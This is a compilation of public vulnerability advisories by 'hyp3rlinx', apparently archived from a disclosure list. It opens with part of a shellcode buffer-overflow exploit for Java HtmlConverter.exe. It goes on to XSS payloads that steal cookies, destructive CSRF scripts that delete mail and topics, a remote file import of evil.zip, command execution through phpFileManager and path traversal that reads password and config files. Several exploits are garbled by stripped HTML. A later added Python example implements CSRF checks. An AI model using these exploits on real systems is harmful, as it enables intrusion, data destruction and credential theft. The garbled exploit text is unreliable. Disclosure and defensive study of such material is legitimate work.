"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


#JMP ESP kernel32.dll
rp=struct.pack('<L', 0x76E72E2B)   

 
#2469 bytes of padding to reach the saved return address, then the JMP ESP
#address, a short NOP sled and the shellcode
payload="A"*2469+rp+"\x90"*10+sc
subprocess.Popen([pgm, payload], shell=False)


Disclosure Timeline:
=
Vendor Notification: August 28, 2015 
January 20, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
Medium



Description:
=

Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe
 
=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Advanced Electron Forum v1.0.9 Persistent XSS

2016-01-17 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt



Vendor:
=
www.anelectron.com/downloads/



Product:

Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.



Vulnerability Type:
===
Persistent XSS



CVE Reference:
==
N/A



Vulnerability Details:
=

In the Admin panel under Edit Boards / General Stuff / General Options

there is an option to specify a redirect URL for the forum.

See --> Redirect Forum:
Enter a URL to which this forum will be redirected to.

The redirect input field is vulnerable to a persistent XSS that will be stored 
in the MySQL database
and execute attacker-supplied client-side code each time a victim visits the 
following URLs. 

http://localhost/AEF(1.0.9)_Install/index.php?

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1



Exploit code(s):
===

Persistent XSS 

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1"
 method="post">

document.getElementById('XSS-DE-PERSISTO').submit()

  


Some other misc XSS(s) under 'Signature' area.


http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=signature
on Anchor link setting
http://"onMouseMove="alert(0)

AND

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=writepm
email link:
mailto:"onMouseMove="alert(1)



Disclosure Timeline:
=
Vendor Notification:  NA
January 17, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

High



Description:
=


Request Method(s):[+] POST


Vulnerable Product:   [+] AEF v1.0.9 (exploit patched version)


Vulnerable Parameter(s):  [+] 'fredirect'

=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Advanced Electron Forum v1.0.9 CSRF

2016-01-17 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt



Vendor:
=
www.anelectron.com/downloads/



Product:

Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.



Vulnerability Type:
===
CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=

In the Admin panel no CSRF protections exist in multiple areas, allowing remote 
attackers to make HTTP requests on behalf of the victim if they
currently have a valid session (logged in) and visit or click an infected link, 
resulting in some of the following destructive actions.

0x01: Change current database settings

0x02: Delete all Inbox / Sent Emails

0x03: Delete all 'shouts'

0x04: Delete all Topics

By the way, edit profile, avatar and more all seem vulnerable as well.


Exploit code(s):
===

CSRF 0x01:

change mysql db settings 
note: however you will need to know or guess the database name.

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=mysqlset"
 method="post" name="mysqlsetform">





document.getElementById('DOOM').submit()



CSRF 0x02:

Delete all Inbox / Sent emails...



http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=sentitems"
 method="post">


 

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=inbox" 
method="post">





//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1 
var uwillsuffer;
var amttodelete=1
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")

function RUIN_EVERYTHING(){
c++ 
//Sent IDs are even numbered, Inbox IDs are odd (even -> sent form, odd -> inbox form)
if(c % 2 == 0){  
arguments[3].value=c
document.getElementById(arguments[1]).submit()
}else{
arguments[2].value=c
document.getElementById(arguments[0]).submit()
}
if(c>=amttodelete){
  clearInterval(uwillsuffer)
  alert("Done!")
 }
}
uwillsuffer = setInterval(RUIN_EVERYTHING, 1000, "DOOM", "DESTRUCT", inbox, 
outbox)  


  

CSRF 0x03:

Delete all 'Shouts'

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=conpan=shoutboxset"
 method="post">






document.getElementById('SPECTOR_OF_HATE').submit()



CSRF 0x04:

Delete all 'Topics' via a simple GET request; this will delete topics 1 through 7...

http://localhost/AEF(1.0.9)_Install/index.php?act=deletetopic=7,6,5,4,3,2,1


Disclosure Timeline:
===
Vendor Notification:  NA
January 17, 2016   : Public Disclosure




Exploitation Technique:
==
Remote 



Severity Level:

High



Description:
===
Request Method(s): [+] POST / GET


Vulnerable Product:[+] AEF v1.0.9 (exploit patched version)

 
===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Advanced Electron Forum v1.0.9 RFI / CSRF

2016-01-17 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AEF-RFI.txt



Vendor:
=
www.anelectron.com/downloads/



Product:

Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.


Vulnerability Type:

Remote File Inclusion / CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=

In the Admin control panel there is an option to Import Skins, and one choice is 
using a web URL.

From AEF:

"Specify the URL of the theme on the net. The theme file must be a compressed 
archive (zip, tgz, tbz2, tar)."

However, there is no CSRF token or check that this is a valid request made 
by the currently logged-in user, resulting
in arbitrary remote file imports from an attacker if the user visits or clicks 
a malicious link. Victims will then be left
open to arbitrary malicious file downloads from anywhere on the net, which may 
be used as a platform for further attacks...



Exploit code(s):
===

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=skin=import"
 method="post">


http://hyp3rlinx.altervista.org/evil.zip; />



document.getElementById('EL-DOWNLOADO').submit()


  



Disclosure Timeline:
==
Vendor Notification:  NA
January 17, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:
==


Request Method(s): [+] POST


Vulnerable Product:[+] Advanced Electron Forum v1.0.9 (AEF)
 


==

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx
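Added example for the AEF RFI/CSRF advisory above, which also covers the AEF CSRF and dotDefender CSRF advisories on this page; it is not code from any of those advisories, from AEF or from dotDefender. It implements the server-side checks whose absence those advisories describe (same-origin check plus a session-bound token, and refusal of state changes over GET) and runs them against a constructed genuine submission and a constructed forged cross-site POST. The site origin, session store and form field names are assumptions.

```python
"""Added example, not code from the advisories, AEF or dotDefender: the
server-side CSRF checks whose absence the advisories describe, run against
constructed requests. Site origin, session store and form names are assumed."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://forum.example"          # assumption: the admin panel's own origin
STATE_CHANGING_METHODS = {"POST", "PUT", "DELETE"}

def issue_csrf_token(session):
    """Mint a per-session secret; the admin templates embed it in each form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def origin_matches(headers):
    """Origin (or Referer when Origin is absent) must name this site. A
    forged auto-submitting form on another site carries that site's origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return "%s://%s" % (parts.scheme, parts.netloc) == SITE_ORIGIN

def csrf_check(method, headers, form, session):
    """Gate for any handler that changes state (rule toggles, skin import,
    topic deletion). Returns (allowed, reason)."""
    if method not in STATE_CHANGING_METHODS:
        # AEF CSRF 0x04 deletes topics over GET; such a request can be forged
        # by a plain <img src>, so the handler itself must refuse GET.
        return False, "state change requested over %s" % method
    if not origin_matches(headers):
        return False, "cross-origin or missing Origin/Referer"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

def demo():
    """Constructed traffic: one genuine admin submission, then the forged
    POST an attacker page would make the victim's browser send."""
    session = {}
    token = issue_csrf_token(session)
    genuine = ("POST", {"Origin": SITE_ORIGIN},
               {"skin_url": "http://forum.example/themes/blue.zip", "csrf_token": token})
    forged = ("POST", {"Origin": "http://attacker.example"},
              {"skin_url": "http://attacker.example/theme.zip"})
    return [csrf_check(m, h, f, session) for m, h, f in (genuine, forged)]

if __name__ == "__main__":
    for allowed, reason in demo():
        print(allowed, reason)
```

A browser that strips Referer on a same-origin POST still sends Origin, so the fallback only matters for very old clients; the token check stays mandatory either way.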


Multiple XSS vulnerabilities in FortiSandbox WebUI

2015-08-03 Thread hyp3rlinx
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt


Vendor:

www.fortinet.com
PSIRT ID: 1418018



Product:
==
FortiSandbox 3000D v2.02 build0042


Vulnerability Type:
===
XSS



CVE Reference:
==
Pending



Advisory Information:
===
Multiple XSS vulnerabilities in FortiSandbox WebUI

Impact

A remote unauthenticated attacker may be able to execute arbitrary code in
the security context of an authenticated user's browser session.

Affected Products

FortiSandbox 2.0.4 and lower.

Solutions

Upgrade to FortiSandbox 2.1 or above.



Vulnerability Details:

http://www.fortiguard.com/advisory/FG-IR-15-019/

The Web User Interface of FortiSandbox version 2.0.4 and below is
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.

5 potential XSS vectors were identified:

* Fortiview threats by users search filtered by serial
* Fortiview threats by users search filtered by vdom
* Export report feature in the Fortiview search page
* Screenshot download generated by the VM scan feature
* PCAP file download generated by the VM scan feature



Exploit code(s):
===

1)
https://localhost/alerts/summary/profile/?prof_type=byusers-profilefrom=byusers-filterusername=10.10.10.10serial=scriptalert(666)/scriptscriptalert('XSS
 by hyp3rlinx 06012015')/scriptvdom=from_time_period=1440#frag-1

vulnerable parameter: serial
--

2)
https://localhost/csearch/report/export/?urlForCreatingReport=scriptalert(666)/scriptscriptalert('XSS
 by hyp3rlinx June 1, 2015')/script

vulnerable parameter: urlForCreatingReport


3)
https://localhost/analysis/detail/download/screenshot?id=/scriptalert('XSS 
by hyp3rlinx June 1, 2015 '%2bdocument.cookie)/script
 
vulnerable parameter: id
--



Disclosure Timeline:

Vendor Notification:  June 1, 2015
Vendor Disclosure: July 24, 2015
August 1, 2015  : Public Disclosure

Fixed In Firmware 2.1



Discovery Status:
=
Published



Exploitation Technique:
===
Remote unauthenticated



Severity Level:
===
Medium



Description:
=


Request Method(s):  [+] GET


Vulnerable Product: [+] FortiSandbox 3000D v2.02


Vulnerable Parameter(s):[+] serial, urlForCreatingReport, id


Affected Area(s):   [+] FortiSandbox Web Admin UI


=

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


phpFileManager 0.9.8 Remote Command Execution

2015-07-31 Thread hyp3rlinx
[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt



Vendor:

phpfm.sourceforge.net



Product:

phpFileManager version 0.9.8


Vulnerability Type:

Remote Command Execution


CVE Reference:
==
N/A



Advisory Information:
===
Remote Command Execution Vulnerability




Vulnerability Details:
=
phpFileManager is vulnerable to remote command execution 
and will call operating system commands via GET requests
from a victim's browser, if the victim can be made to click a malicious link
or visit a malicious website.



Exploit code(s):
===


Remote Command Execution:
-

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\cmd.exe

2- Run Windows calc.exe 

https://localhost/phpFileManager-0.9.8/index.php?action=6current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/cmd=c%3A\Windows\system32\calc.exe



Disclosure Timeline:
=

Vendor Notification:  NA
July 28, 2015 : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+]  phpFileManager  0.9.8


Vulnerable Parameter(s):[+] 'cmd'= [OS command]


Affected Area(s):   [+] Operating System 


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.


by hyp3rlinx


Webgrind XSS vulnerability

2015-05-21 Thread hyp3rlinx
Credits: John Page ( hyp3rlinx )
Domains:  hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-WEBGRIND0520.txt

Vendor:
https://github.com/jokkedk/webgrind

Product:
Webgrind is an Xdebug Profiling Web Frontend in PHP.

Advisory Information:
=
Webgrind is vulnerable to cross site scripting attacks.

Exploit code:
==
http://localhost/webgrind/index.php?op=fileviewerfile=%3Cscript%3Ealert('XSS 
hyp3rlinx')%3C/script%3E

Disclosure Timeline:
==

Vendor Notification  May 19, 2015
May 20, 2015: Public Disclosure


Severity Level:
===
Med

Description:


Request Method(s):
[+] GET

Vulnerable Product:
[+] Webgrind 

Vulnerable Parameter(s):
[+] file=[XSS]

Affected Area(s):
[+] Current user.

==

(hyp3rlinx)


Sqlbuddy Path Traversal Vulnerability

2015-05-11 Thread hyp3rlinx
Exploit Author: John Page (hyp3rlinx) 
Website: hyp3rlinx.altervista.org/ 
Vendor Homepage: www.sqlbuddy.com
Version: 1.3.3

SQL Buddy is an open source web based MySQL administration application.

Advisory Information: == sqlbuddy suffers from directory 
traversal whereby a user can move about directories an read any PHP and non PHP 
files by appending the '#' hash character when requesting files via URLs. e.g. 
.doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a 
delimiter any non PHP will be returned and rendered by subverting the .php 
concatenation used by sqlbuddy when requesting PHP pages via POST method. 
Normal sqlbuddy request: 
http://localhost/sqlbuddy/home.php?ajaxRequest=666requestKey=xx POC 

Exploit payloads: === 1-Read from Apache restricted 
directory under htdocs: 
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any 
arbitrary files that do not have .PHP extensions: 
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read 
phpinfo (no need for '#' as phpinfo is a PHP file): 
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo

Severity Level: === High

Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable 
Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories  
sensitive files Solution - Fix  

Patch: === N/A